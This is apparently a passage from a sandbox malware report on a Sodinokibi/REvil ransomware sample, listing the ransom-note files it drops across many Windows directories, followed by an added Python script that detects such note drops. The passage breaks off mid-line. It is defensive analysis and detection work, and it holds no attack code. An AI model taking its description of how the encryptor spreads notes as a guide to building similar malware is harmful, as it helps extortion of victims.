        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\history\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\rtsigs\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\scans\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\activitylog\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\common coverpages\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\inbox\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\queue\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\sentitems\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\virtualinbox\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1002\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1003\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\catalog\packages\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\integration\shortcutbackups\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\a605f2a5-9d01-4691-9fdc-be6391d70203\en-us.16\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\a605f2a5-9d01-4691-9fdc-be6391d70203\x-none.16\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-us\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-us\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\prov\runtime\356kf7c535-readme.txtJump to behavior
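        The drop list above is the most actionable artifact in this section: the sample writes one copy of the same note into every directory it walks, and Sodinokibi/REvil names that note "<token>-readme.txt" where <token> is the random string it also appends to encrypted files (this section shows only the notes, not the renamed files). Two things fall out of the list for a responder: the token to hunt for on other hosts and file shares, and the scope of the traversal. The script below is an added example, not part of the Joe Sandbox report: it parses event lines in the report's own "Source: ... File created: ..." shape, groups note-like file names by creating process, and flags a (process, note) pair only when the same note lands in many distinct directories, which is what separates an encryptor from an installer that writes a single readme. The sample input is constructed from a handful of the lines above plus two lines that are not in the report (a vendor readme and a single-directory note) so the negative cases are visible; the 5-10 character token length is an assumption made for the example.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample in the report's own "Source: ... File created: ..." line
# shape: a subset of the ransom-note drops listed in the report, one duplicated
# line, and two extra lines (a vendor readme and a single-directory note) that
# are NOT in the report and exist only to show what is not flagged.
SAMPLE_EVENTS = r"""
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\event viewer\views\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\identitycrl\int\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\identitycrl\production\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\netframework\breadcrumbstore\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\network\connections\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\network\downloader\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\programdata\microsoft\provisioning\assetcache\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\users\user\desktop\curqnkvoix\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\users\user\documents\20200719\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\users\user\favorites\links\356kf7c535-readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\users\user\documents\20200719\356kf7c535-readme.txt
Source: C:\Program Files\Example\setup.exe File created: c:\program files\example\readme.txt
Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: c:\users\user\appdata\local\temp\abcd1-readme.txt
"""

# One sandbox event line -> (process image, created path).
EVENT_RE = re.compile(r"^Source:\s*(?P<proc>.+?)\s*File created:\s*(?P<path>.+?)\s*$")

# Sodinokibi/REvil note naming: "<token>-readme.txt", where <token> is the random
# alphanumeric string also appended to encrypted files. The 5-10 character bound
# is an assumption made for this example, not something the report states.
NOTE_RE = re.compile(r"^(?P<token>[a-z0-9]{5,10})-readme\.txt$", re.IGNORECASE)


def parse_events(text):
    """Return (process, path) for every line that parses as a file-creation event."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["proc"], m["path"]))
    return events


def find_ransom_note_drops(text, min_dirs=5):
    """Group note-like creations by (process, note name); return the groups whose
    note landed in at least `min_dirs` distinct directories.

    An installer writes one readme in one place; an encryptor writes the same note
    into every directory it walks, so the distinct-directory count separates the
    two far better than the file name alone."""
    dirs_by_note = defaultdict(set)
    for proc, path in parse_events(text):
        p = PureWindowsPath(path)
        if NOTE_RE.match(p.name):
            # Directory names are case-folded so duplicate events collapse.
            dirs_by_note[(proc, p.name.lower())].add(str(p.parent).lower())

    findings = {}
    for (proc, note), dirs in dirs_by_note.items():
        if len(dirs) >= min_dirs:
            findings[note] = {
                "process": proc,
                "token": NOTE_RE.match(note)["token"],  # the extension to hunt for
                "directory_count": len(dirs),
                "directories": sorted(dirs),
            }
    return findings


if __name__ == "__main__":
    for note, info in find_ransom_note_drops(SAMPLE_EVENTS).items():
        print(f"{note}: written by {info['process']} into "
              f"{info['directory_count']} directories; hunt for *.{info['token']}")
```

To run this against live telemetry, map Sysmon Event ID 11 (FileCreate) records onto the same two fields (Image and TargetFilename) before feeding them in; the threshold is deliberately a parameter, because a single-directory hit such as the abcd1-readme.txt line is worth a look but not an alert on its own.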
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (37 identical entries in the original report)
        Source: C:\Windows\System32\Win